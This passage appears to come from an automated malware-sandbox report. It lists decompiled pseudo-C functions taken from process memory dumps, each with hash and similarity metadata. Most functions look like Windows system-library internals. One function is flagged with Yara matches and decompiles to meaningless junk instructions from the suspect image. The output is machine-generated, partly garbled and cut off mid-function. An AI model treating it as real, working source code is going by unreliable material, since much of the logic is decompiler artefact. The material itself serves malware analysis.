                                                              						L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
                                                              						goto L11;
                                                              					}
                                                              				} else {
                                                              					_t13 =  *_t29;
                                                              					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
                                                              						L13:
                                                              						_push(3);
                                                              						asm("int 0x29");
                                                              						L14:
                                                              						 *_t27 = _t29;
                                                              						L11:
                                                              						return 0;
                                                              					}
                                                              					_t20 =  *((intOrPtr*)(_t29 + 4));
                                                              					if( *_t20 != _t29) {
                                                              						goto L13;
                                                              					}
                                                              					 *_t20 = _t13;
                                                              					 *((intOrPtr*)(_t13 + 4)) = _t20;
                                                              					asm("btr eax, ecx");
                                                              					goto L6;
                                                              				}
                                                              			}












                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Similarity
                                                              • Opcode ID: f782a68505707ade828aab232a2ed573a5dd301a9ee81b6942abb9478b647d8a
                                                              • Instruction ID: 1517e3a5a4ba2b110ee656843ac9a92ef1a370abc1327551ad7fee3bb94f05ae
                                                              • Opcode Fuzzy Hash: f782a68505707ade828aab232a2ed573a5dd301a9ee81b6942abb9478b647d8a
                                                              • Instruction Fuzzy Hash: 8401DB729017315BC3378B1DD940E26BBEAFF89B5071540A9E9C58F315D778D801CB80
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E0101002D() {
                                                              				void* _t11;
                                                              				char* _t14;
                                                              				signed char* _t16;
                                                              				char* _t27;
                                                              				signed char* _t29;
                                                              
                                                              				_t11 = E01007D50();
                                                              				_t27 = 0x7ffe0384;
                                                              				if(_t11 != 0) {
                                                              					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                              				} else {
                                                              					_t14 = 0x7ffe0384;
                                                              				}
                                                              				_t29 = 0x7ffe0385;
                                                              				if( *_t14 != 0) {
                                                              					if(E01007D50() == 0) {
                                                              						_t16 = 0x7ffe0385;
                                                              					} else {
                                                              						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                              					}
                                                              					if(( *_t16 & 0x00000040) != 0) {
                                                              						goto L18;
                                                              					} else {
                                                              						goto L3;
                                                              					}
                                                              				} else {
                                                              					L3:
                                                              					if(E01007D50() != 0) {
                                                              						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                              					}
                                                              					if( *_t27 != 0) {
                                                              						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
                                                              							goto L5;
                                                              						}
                                                              						if(E01007D50() != 0) {
                                                              							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                              						}
                                                              						if(( *_t29 & 0x00000020) == 0) {
                                                              							goto L5;
                                                              						}
                                                              						L18:
                                                              						return 1;
                                                              					} else {
                                                              						L5:
                                                              						return 0;
                                                              					}
                                                              				}
                                                              			}









                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Similarity
                                                              • Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                              • Instruction ID: ec75ab11c39129b821572bb9ba80b66d24e156040d19ef970374858e9efe20dc
                                                              • Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                              • Instruction Fuzzy Hash: 8F118E72605A818FF7A39B28C944BAA7BE5AB41754F0900E1EEC4C7696E72DD8C1C660
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 94%
                                                              			E00FF766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
                                                              				char _v8;
                                                              				void* _t22;
                                                              				void* _t24;
                                                              				intOrPtr _t29;
                                                              				intOrPtr* _t30;
                                                              				void* _t42;
                                                              				intOrPtr _t47;
                                                              
                                                              				_push(__ecx);
                                                              				_t36 =  &_v8;
                                                              				if(E0101F3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
                                                              					L10:
                                                              					_t22 = 0;
                                                              				} else {
                                                              					_t24 = _v8 + __ecx;
                                                              					_t42 = _t24;
                                                              					if(_t24 < __ecx) {
                                                              						goto L10;
                                                              					} else {
                                                              						if(E0101F3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
                                                              							goto L10;
                                                              						} else {
                                                              							_t29 = _v8 + _t42;
                                                              							if(_t29 < _t42) {
                                                              								goto L10;
                                                              							} else {
                                                              								_t47 = _t29;
                                                              								_t30 = _a16;
                                                              								if(_t30 != 0) {
                                                              									 *_t30 = _t47;
                                                              								}
                                                              								if(_t47 == 0) {
                                                              									goto L10;
                                                              								} else {
                                                              									_t22 = L01004620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
                                                              								}
                                                              							}
                                                              						}
                                                              					}
                                                              				}
                                                              				return _t22;
                                                              			}











                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Similarity
                                                              • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                              • Instruction ID: 5ad8798f595310c11eb14850abc2978414a45890d09bdd163c96264b82e9eee5
                                                              • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                              • Instruction Fuzzy Hash: 44018D3270461DABC710AE5DCD41E67B7ADEF84760F144534BA04CB2A4EA30DD0197A0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 69%
                                                              			E00FE9080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
                                                              				intOrPtr* _t51;
                                                              				intOrPtr _t59;
                                                              				signed int _t64;
                                                              				signed int _t67;
                                                              				signed int* _t71;
                                                              				signed int _t74;
                                                              				signed int _t77;
                                                              				signed int _t82;
                                                              				intOrPtr* _t84;
                                                              				void* _t85;
                                                              				intOrPtr* _t87;
                                                              				void* _t94;
                                                              				signed int _t95;
                                                              				intOrPtr* _t97;
                                                              				signed int _t99;
                                                              				signed int _t102;
                                                              				void* _t104;
                                                              
                                                              				_push(__ebx);
                                                              				_push(__esi);
                                                              				_push(__edi);
                                                              				_t97 = __ecx;
                                                              				_t102 =  *(__ecx + 0x14);
                                                              				if((_t102 & 0x02ffffff) == 0x2000000) {
                                                              					_t102 = _t102 | 0x000007d0;
                                                              				}
                                                              				_t48 =  *[fs:0x30];
                                                              				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
                                                              					_t102 = _t102 & 0xff000000;
                                                              				}
                                                              				_t80 = 0x10d85ec;
                                                              				E01002280(_t48, 0x10d85ec);
                                                              				_t51 =  *_t97 + 8;
                                                              				if( *_t51 != 0) {
                                                              					L6:
                                                              					return E00FFFFB0(_t80, _t97, _t80);
                                                              				} else {
                                                              					 *(_t97 + 0x14) = _t102;
                                                              					_t84 =  *0x10d538c; // 0x77f06828
                                                              					if( *_t84 != 0x10d5388) {
                                                              						_t85 = 3;
                                                              						asm("int 0x29");
                                                              						asm("int3");
                                                              						asm("int3");
                                                              						asm("int3");
                                                              						asm("int3");
                                                              						asm("int3");
                                                              						asm("int3");
                                                              						asm("int3");
                                                              						asm("int3");
                                                              						asm("int3");
                                                              						asm("int3");
                                                              						asm("int3");
                                                              						asm("int3");
                                                              						_push(0x2c);
                                                              						_push(0x10bf6e8);
                                                              						E0103D0E8(0x10d85ec, _t97, _t102);
                                                              						 *((char*)(_t104 - 0x1d)) = 0;
                                                              						_t99 =  *(_t104 + 8);
                                                              						__eflags = _t99;
                                                              						if(_t99 == 0) {
                                                              							L13:
                                                              							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                                                              							if(__eflags == 0) {
                                                              								E010B88F5(_t80, _t85, 0x10d5388, _t99, _t102, __eflags);
                                                              							}
                                                              						} else {
                                                              							__eflags = _t99 -  *0x10d86c0; // 0xb807b0
                                                              							if(__eflags == 0) {
                                                              								goto L13;
                                                              							} else {
                                                              								__eflags = _t99 -  *0x10d86b8; // 0x0
                                                              								if(__eflags == 0) {
                                                              									goto L13;
                                                              								} else {
                                                              									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
                                                              									__eflags =  *((char*)(_t59 + 0x28));
                                                              									if( *((char*)(_t59 + 0x28)) == 0) {
                                                              										E01002280(_t99 + 0xe0, _t99 + 0xe0);
                                                              										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
                                                              										__eflags =  *((char*)(_t99 + 0xe5));
                                                              										if(__eflags != 0) {
                                                              											E010B88F5(0x10d85ec, _t85, 0x10d5388, _t99, _t102, __eflags);
                                                              										} else {
                                                              											__eflags =  *((char*)(_t99 + 0xe4));
                                                              											if( *((char*)(_t99 + 0xe4)) == 0) {
                                                              												 *((char*)(_t99 + 0xe4)) = 1;
                                                              												_push(_t99);
                                                              												_push( *((intOrPtr*)(_t99 + 0x24)));
                                                              												E0102AFD0();
                                                              											}
                                                              											while(1) {
                                                              												_t71 = _t99 + 8;
                                                              												 *(_t104 - 0x2c) = _t71;
                                                              												_t80 =  *_t71;
                                                              												_t95 = _t71[1];
                                                              												 *(_t104 - 0x28) = _t80;
                                                              												 *(_t104 - 0x24) = _t95;
                                                              												while(1) {
                                                              													L19:
                                                              													__eflags = _t95;
                                                              													if(_t95 == 0) {
                                                              														break;
                                                              													}
                                                              													_t102 = _t80;
                                                              													 *(_t104 - 0x30) = _t95;
                                                              													 *(_t104 - 0x24) = _t95 - 1;
                                                              													asm("lock cmpxchg8b [edi]");
                                                              													_t80 = _t102;
                                                              													 *(_t104 - 0x28) = _t80;
                                                              													 *(_t104 - 0x24) = _t95;
                                                              													__eflags = _t80 - _t102;
                                                              													_t99 =  *(_t104 + 8);
                                                              													if(_t80 != _t102) {
                                                              														continue;
                                                              													} else {
                                                              														__eflags = _t95 -  *(_t104 - 0x30);
                                                              														if(_t95 !=  *(_t104 - 0x30)) {
                                                              															continue;
                                                              														} else {
                                                              															__eflags = _t95;
                                                              															if(_t95 != 0) {
                                                              																_t74 = 0;
                                                              																 *(_t104 - 0x34) = 0;
                                                              																_t102 = 0;
                                                              																__eflags = 0;
                                                              																while(1) {
                                                              																	 *(_t104 - 0x3c) = _t102;
                                                              																	__eflags = _t102 - 3;
                                                              																	if(_t102 >= 3) {
                                                              																		break;
                                                              																	}
                                                              																	__eflags = _t74;
                                                              																	if(_t74 != 0) {
                                                              																		L49:
                                                              																		_t102 =  *_t74;
                                                              																		__eflags = _t102;
                                                              																		if(_t102 != 0) {
                                                              																			_t102 =  *(_t102 + 4);
                                                              																			__eflags = _t102;
                                                              																			if(_t102 != 0) {
                                                              																				 *0x10db1e0(_t74, _t99);
                                                              																				 *_t102();
                                                              																			}
                                                              																		}
                                                              																		do {
                                                              																			_t71 = _t99 + 8;
                                                              																			 *(_t104 - 0x2c) = _t71;
                                                              																			_t80 =  *_t71;
                                                              																			_t95 = _t71[1];
                                                              																			 *(_t104 - 0x28) = _t80;
                                                              																			 *(_t104 - 0x24) = _t95;
                                                              																			goto L19;
                                                              																		} while (_t74 == 0);
                                                              																		goto L49;
                                                              																	} else {
                                                              																		_t82 = 0;
                                                              																		__eflags = 0;
                                                              																		while(1) {
                                                              																			 *(_t104 - 0x38) = _t82;
                                                              																			__eflags = _t82 -  *0x10d84c0;
                                                              																			if(_t82 >=  *0x10d84c0) {
                                                              																				break;
                                                              																			}
                                                              																			__eflags = _t74;
                                                              																			if(_t74 == 0) {
                                                              																				_t77 = E010B9063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
                                                              																				__eflags = _t77;
                                                              																				if(_t77 == 0) {
                                                              																					_t74 = 0;
                                                              																					__eflags = 0;
                                                              																				} else {
                                                              																					_t74 = _t77 + 0xfffffff4;
                                                              																				}
                                                              																				 *(_t104 - 0x34) = _t74;
                                                              																				_t82 = _t82 + 1;
                                                              																				continue;
                                                              																			}
                                                              																			break;
                                                              																		}
                                                              																		_t102 = _t102 + 1;
                                                              																		continue;
                                                              																	}
                                                              																	goto L20;
                                                              																}
                                                              																__eflags = _t74;
                                                              															}
                                                              														}
                                                              													}
                                                              													break;
                                                              												}
                                                              												L20:
                                                              												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
                                                              												 *((char*)(_t99 + 0xe5)) = 1;
                                                              												 *((char*)(_t104 - 0x1d)) = 1;
                                                              												goto L21;
                                                              											}
                                                              										}
                                                              										L21:
                                                              										 *(_t104 - 4) = 0xfffffffe;
                                                              										E00FE922A(_t99);
                                                              										_t64 = E01007D50();
                                                              										__eflags = _t64;
                                                              										if(_t64 != 0) {
                                                              											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                              										} else {
                                                              											_t67 = 0x7ffe0386;
                                                              										}
                                                              										__eflags =  *_t67;
                                                              										if( *_t67 != 0) {
                                                              											_t67 = E010B8B58(_t99);
                                                              										}
                                                              										__eflags =  *((char*)(_t104 - 0x1d));
                                                              										if( *((char*)(_t104 - 0x1d)) != 0) {
                                                              											__eflags = _t99 -  *0x10d86c0; // 0xb807b0
                                                              											if(__eflags != 0) {
                                                              												__eflags = _t99 -  *0x10d86b8; // 0x0
                                                              												if(__eflags == 0) {
                                                              													_t94 = 0x10d86bc;
                                                              													_t87 = 0x10d86b8;
                                                              													goto L27;
                                                              												} else {
                                                              													__eflags = _t67 | 0xffffffff;
                                                              													asm("lock xadd [edi], eax");
                                                              													if(__eflags == 0) {
                                                              														E00FE9240(_t80, _t99, _t99, _t102, __eflags);
                                                              													}
                                                              												}
                                                              											} else {
                                                              												_t94 = 0x10d86c4;
                                                              												_t87 = 0x10d86c0;
                                                              												L27:
                                                              												E01019B82(_t80, _t87, _t94, _t99, _t102, __eflags);
                                                              											}
                                                              										}
                                                              									} else {
                                                              										goto L13;
                                                              									}
                                                              								}
                                                              							}
                                                              						}
                                                              						return E0103D130(_t80, _t99, _t102);
                                                              					} else {
                                                              						 *_t51 = 0x10d5388;
                                                              						 *((intOrPtr*)(_t51 + 4)) = _t84;
                                                              						 *_t84 = _t51;
                                                              						 *0x10d538c = _t51;
                                                              						goto L6;
                                                              					}
                                                              				}
                                                              			}





















                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4c4d7ad29b29f8c4416ad427c098e2b978634e35b3e8a5b5f8e0ff1f71cd573f
                                                              • Instruction ID: 11f9a035b1df06ceb3b46648dc787e47993c685e7f46431f34aa1b7247f9fd95
                                                              • Opcode Fuzzy Hash: 4c4d7ad29b29f8c4416ad427c098e2b978634e35b3e8a5b5f8e0ff1f71cd573f
                                                              • Instruction Fuzzy Hash: 090128729053449FC3258F29DC40B117BB9FF81320F618026FA018B7A1C7B5DC41DBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 46%
                                                              			E0107C450(intOrPtr* _a4) {
                                                              				signed char _t25;
                                                              				intOrPtr* _t26;
                                                              				intOrPtr* _t27;
                                                              
                                                              				_t26 = _a4;
                                                              				_t25 =  *(_t26 + 0x10);
                                                              				if((_t25 & 0x00000003) != 1) {
                                                              					_push(0);
                                                              					_push(0);
                                                              					_push(0);
                                                              					_push( *((intOrPtr*)(_t26 + 8)));
                                                              					_push(0);
                                                              					_push( *_t26);
                                                              					E01029910();
                                                              					_t25 =  *(_t26 + 0x10);
                                                              				}
                                                              				if((_t25 & 0x00000001) != 0) {
                                                              					_push(4);
                                                              					_t7 = _t26 + 4; // 0x4
                                                              					_t27 = _t7;
                                                              					_push(_t27);
                                                              					_push(5);
                                                              					_push(0xfffffffe);
                                                              					E010295B0();
                                                              					if( *_t27 != 0) {
                                                              						_push( *_t27);
                                                              						E010295D0();
                                                              					}
                                                              				}
                                                              				_t8 = _t26 + 0x14; // 0x14
                                                              				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
                                                              					L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
                                                              				}
                                                              				_push( *_t26);
                                                              				E010295D0();
                                                              				return L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
                                                              			}







                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                              • Instruction ID: 74a14b921f5978c9d0f4cf507ea9043f0788ad4492c37878e405e72d4d74293c
                                                              • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                              • Instruction Fuzzy Hash: C1018072240526BFE621AF69CD80EA2BB6DFF64394F004525F294425A0CB31ACA0CBA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 86%
                                                              			E010B4015(signed int __eax, signed int __ecx) {
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				signed char _t10;
                                                              				signed int _t28;
                                                              
                                                              				_push(__ecx);
                                                              				_t28 = __ecx;
                                                              				asm("lock xadd [edi+0x24], eax");
                                                              				_t10 = (__eax | 0xffffffff) - 1;
                                                              				if(_t10 == 0) {
                                                              					_t1 = _t28 + 0x1c; // 0x1e
                                                              					E01002280(_t10, _t1);
                                                              					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                              					E01002280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x10d86ac);
                                                              					E00FEF900(0x10d86d4, _t28);
                                                              					E00FFFFB0(0x10d86ac, _t28, 0x10d86ac);
                                                              					 *((intOrPtr*)(_t28 + 0x20)) = 0;
                                                              					E00FFFFB0(0, _t28, _t1);
                                                              					_t18 =  *((intOrPtr*)(_t28 + 0x94));
                                                              					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
                                                              						L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
                                                              					}
                                                              					_t10 = L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
                                                              				}
                                                              				return _t10;
                                                              			}








                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4e9816413eff205854edb56c4af83172fde7ba6d69acff35fb4e762d618570a7
                                                              • Instruction ID: 1bf9d941d4c1b77d055e0936691582e0acfe6ef8554fd50fdcb1c6ffd85ee554
                                                              • Opcode Fuzzy Hash: 4e9816413eff205854edb56c4af83172fde7ba6d69acff35fb4e762d618570a7
                                                              • Instruction Fuzzy Hash: 5601A7712016467FD251AB79CD84E67B7ACFF49760B000225F648C7A62CB38EC11C6E4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 61%
                                                              			E010A14FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                              				signed int _v8;
                                                              				intOrPtr _v16;
                                                              				intOrPtr _v20;
                                                              				intOrPtr _v24;
                                                              				intOrPtr _v28;
                                                              				short _v54;
                                                              				char _v60;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				signed char* _t21;
                                                              				intOrPtr _t27;
                                                              				intOrPtr _t33;
                                                              				intOrPtr _t34;
                                                              				signed int _t35;
                                                              
                                                              				_t32 = __edx;
                                                              				_t27 = __ebx;
                                                              				_v8 =  *0x10dd360 ^ _t35;
                                                              				_t33 = __edx;
                                                              				_t34 = __ecx;
                                                              				E0102FA60( &_v60, 0, 0x30);
                                                              				_v20 = _a4;
                                                              				_v16 = _a8;
                                                              				_v28 = _t34;
                                                              				_v24 = _t33;
                                                              				_v54 = 0x1034;
                                                              				if(E01007D50() == 0) {
                                                              					_t21 = 0x7ffe0388;
                                                              				} else {
                                                              					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                              				}
                                                              				_push( &_v60);
                                                              				_push(0x10);
                                                              				_push(0x20402);
                                                              				_push( *_t21 & 0x000000ff);
                                                              				return E0102B640(E01029AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                              			}


















                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d637849de4944d8bbcc7d592230bdb4af20ae2c0bf1ff18d2c3b805d4df55c26
                                                              • Instruction ID: e556d6b083c8a2ced2b7040706bbf89e6995779dd8c68bea3cda063bac37c1f3
                                                              • Opcode Fuzzy Hash: d637849de4944d8bbcc7d592230bdb4af20ae2c0bf1ff18d2c3b805d4df55c26
                                                              • Instruction Fuzzy Hash: 0B01B571A01259EFDB10DFA8D846EEEBBB8EF45710F444066F984EB380DA74DA00CB94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 61%
                                                              			E010A138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                              				signed int _v8;
                                                              				intOrPtr _v16;
                                                              				intOrPtr _v20;
                                                              				intOrPtr _v24;
                                                              				intOrPtr _v28;
                                                              				short _v54;
                                                              				char _v60;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				signed char* _t21;
                                                              				intOrPtr _t27;
                                                              				intOrPtr _t33;
                                                              				intOrPtr _t34;
                                                              				signed int _t35;
                                                              
                                                              				_t32 = __edx;
                                                              				_t27 = __ebx;
                                                              				_v8 =  *0x10dd360 ^ _t35;
                                                              				_t33 = __edx;
                                                              				_t34 = __ecx;
                                                              				E0102FA60( &_v60, 0, 0x30);
                                                              				_v20 = _a4;
                                                              				_v16 = _a8;
                                                              				_v28 = _t34;
                                                              				_v24 = _t33;
                                                              				_v54 = 0x1033;
                                                              				if(E01007D50() == 0) {
                                                              					_t21 = 0x7ffe0388;
                                                              				} else {
                                                              					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                              				}
                                                              				_push( &_v60);
                                                              				_push(0x10);
                                                              				_push(0x20402);
                                                              				_push( *_t21 & 0x000000ff);
                                                              				return E0102B640(E01029AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                              			}


















                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2475f320e127702001bd3242340dec0e5baef603687c6ebd0139ecb0115d6c42
                                                              • Instruction ID: 2aae695a193f592f62e19699072d6e36b9a62541f0de39ea83267d2085e93d22
                                                              • Opcode Fuzzy Hash: 2475f320e127702001bd3242340dec0e5baef603687c6ebd0139ecb0115d6c42
                                                              • Instruction Fuzzy Hash: 58015E71A01219AFDB14EFA9D846EAEBBB8EF44710F404066F944EB280DA74DA01CB94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 42%
                                                              			E0040E3A2(void* __eax, void* __ebx, char* __ecx, signed char __edx, void* __edi, void* __esi) {
                                                              				intOrPtr _t38;
                                                              				signed char _t41;
                                                              				void* _t44;
                                                              				void* _t48;
                                                              
                                                              				_t48 = __esi;
                                                              				_t44 = __edi;
                                                              				_t41 = __edx;
                                                              				asm("adc al, 0x58");
                                                              				_t28 = __ecx;
                                                              				_push(0x2d69e234);
                                                              				 *((intOrPtr*)(__eax - 0x2b)) =  *((intOrPtr*)(__eax - 0x2b)) - __eax - 0xa8;
                                                              				asm("aad 0xb");
                                                              				 *((intOrPtr*)(__ecx)) =  *((intOrPtr*)(__ecx)) + __edx;
                                                              				_push(ss);
                                                              				_t38 =  *((intOrPtr*)(__edi - 0x51));
                                                              				_push(ds);
                                                              				asm("sahf");
                                                              				asm("cdq");
                                                              				asm("popfd");
                                                              				asm("out dx, eax");
                                                              				 *((intOrPtr*)(__ecx - 0x14)) =  *((intOrPtr*)(__ecx - 0x14)) + 1;
                                                              				asm("insb");
                                                              				asm("aad 0x69");
                                                              				if(__ebx -  *((intOrPtr*)(_t38 - 0x6d3b3533)) >= 0) {
                                                              					 *__edx =  *__edx + __ecx;
                                                              					_push(es);
                                                              					_t28 =  *0x7fb6411a;
                                                              					 *0xfe5dbdd1 = _t28;
                                                              				}
                                                              				 *_t28 =  *_t28 - 1;
                                                              				 *(_t38 + 0x75) =  *(_t38 + 0x75) & _t41;
                                                              			}








                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274205933.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 806c4d212c1612a4a40a0cb965320908f7623ce29ae8bc84667bf48d62883fb7
                                                              • Instruction ID: b3a92c52287c3bec2eb541c460db733e52da949487e1f53b4aebcd6508260c87
                                                              • Opcode Fuzzy Hash: 806c4d212c1612a4a40a0cb965320908f7623ce29ae8bc84667bf48d62883fb7
                                                              • Instruction Fuzzy Hash: D8F078F7A1A3C14FD7128E3194181F5BFB1DB6722930401EEC8809B223D1729402C728
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 91%
                                                              			E00FE58EC(intOrPtr __ecx) {
                                                              				signed int _v8;
                                                              				char _v28;
                                                              				char _v44;
                                                              				char _v76;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				intOrPtr _t10;
                                                              				intOrPtr _t16;
                                                              				intOrPtr _t17;
                                                              				intOrPtr _t27;
                                                              				intOrPtr _t28;
                                                              				signed int _t29;
                                                              
                                                              				_v8 =  *0x10dd360 ^ _t29;
                                                              				_t10 =  *[fs:0x30];
                                                              				_t27 = __ecx;
                                                              				if(_t10 == 0) {
                                                              					L6:
                                                              					_t28 = 0xfc5c80;
                                                              				} else {
                                                              					_t16 =  *((intOrPtr*)(_t10 + 0x10));
                                                              					if(_t16 == 0) {
                                                              						goto L6;
                                                              					} else {
                                                              						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
                                                              					}
                                                              				}
                                                              				if(E00FE5943() != 0 &&  *0x10d5320 > 5) {
                                                              					E01067B5E( &_v44, _t27);
                                                              					_t22 =  &_v28;
                                                              					E01067B5E( &_v28, _t28);
                                                              					_t11 = E01067B9C(0x10d5320, 0xfcbf15,  &_v28, _t22, 4,  &_v76);
                                                              				}
                                                              				return E0102B640(_t11, _t17, _v8 ^ _t29, 0xfcbf15, _t27, _t28);
                                                              			}
















                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E00FFB02A(intOrPtr __ecx, signed short* __edx, short _a4) {
                                                              				signed char _t11;
                                                              				signed char* _t12;
                                                              				intOrPtr _t24;
                                                              				signed short* _t25;
                                                              
                                                              				_t25 = __edx;
                                                              				_t24 = __ecx;
                                                              				_t11 = ( *[fs:0x30])[0x50];
                                                              				if(_t11 != 0) {
                                                              					if( *_t11 == 0) {
                                                              						goto L1;
                                                              					}
                                                              					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
                                                              					L2:
                                                              					if( *_t12 != 0) {
                                                              						_t12 =  *[fs:0x30];
                                                              						if((_t12[0x240] & 0x00000004) == 0) {
                                                              							goto L3;
                                                              						}
                                                              						if(E01007D50() == 0) {
                                                              							_t12 = 0x7ffe0385;
                                                              						} else {
                                                              							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
                                                              						}
                                                              						if(( *_t12 & 0x00000020) == 0) {
                                                              							goto L3;
                                                              						}
                                                              						return E01067016(_a4, _t24, 0, 0, _t25, 0);
                                                              					}
                                                              					L3:
                                                              					return _t12;
                                                              				}
                                                              				L1:
                                                              				_t12 = 0x7ffe0384;
                                                              				goto L2;
                                                              			}








                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E010B1074(void* __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
                                                              				char _v8;
                                                              				void* _v11;
                                                              				unsigned int _v12;
                                                              				void* _v15;
                                                              				void* __esi;
                                                              				void* __ebp;
                                                              				char* _t16;
                                                              				signed int* _t35;
                                                              
                                                              				_t22 = __ebx;
                                                              				_t35 = __ecx;
                                                              				_v8 = __edx;
                                                              				_t13 =  !( *__ecx) + 1;
                                                              				_v12 =  !( *__ecx) + 1;
                                                              				if(_a4 != 0) {
